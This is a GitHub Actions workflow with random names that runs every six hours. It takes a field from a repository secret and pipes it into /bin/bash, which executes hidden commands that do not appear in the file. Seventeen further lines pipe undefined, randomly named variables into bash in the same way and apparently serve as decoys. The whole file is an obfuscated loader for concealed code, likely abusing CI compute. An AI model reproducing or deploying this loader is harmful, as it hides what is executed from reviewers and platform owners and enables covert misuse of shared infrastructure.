name: bishasx
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bishasx
        env:
          ty0: ${{ secrets.ty0 }}
        run: |
          echo $ty0 | jq -r .yrmpp7110 | /bin/bash
          echo $vk7586 | jq -r .dw19 | /bin/bash
          echo $yte50 | jq -r .tam525 | /bin/bash
          echo $jkjfi0 | jq -r .mgl54063 | /bin/bash
          echo $mgpi61439 | jq -r .gfz687 | /bin/bash
          echo $abezn080 | jq -r .z26 | /bin/bash
          echo $mjwa278 | jq -r .w02 | /bin/bash
          echo $zrw2839 | jq -r .f049 | /bin/bash
          echo $hpudn9 | jq -r .mu959 | /bin/bash
          echo $caw44 | jq -r .xcr04788 | /bin/bash
          echo $i86 | jq -r .jhs55762 | /bin/bash
          echo $yfiao218 | jq -r .fwses77 | /bin/bash
          echo $rlbf4475 | jq -r .k60 | /bin/bash
          echo $ughi16872 | jq -r .ul88 | /bin/bash
          echo $mocr10493 | jq -r .ukjx07818 | /bin/bash
          echo $o59043 | jq -r .i28306 | /bin/bash
          echo $cp35 | jq -r .gxpnd14676 | /bin/bash
          echo $rk39690 | jq -r .ub97061 | /bin/bash

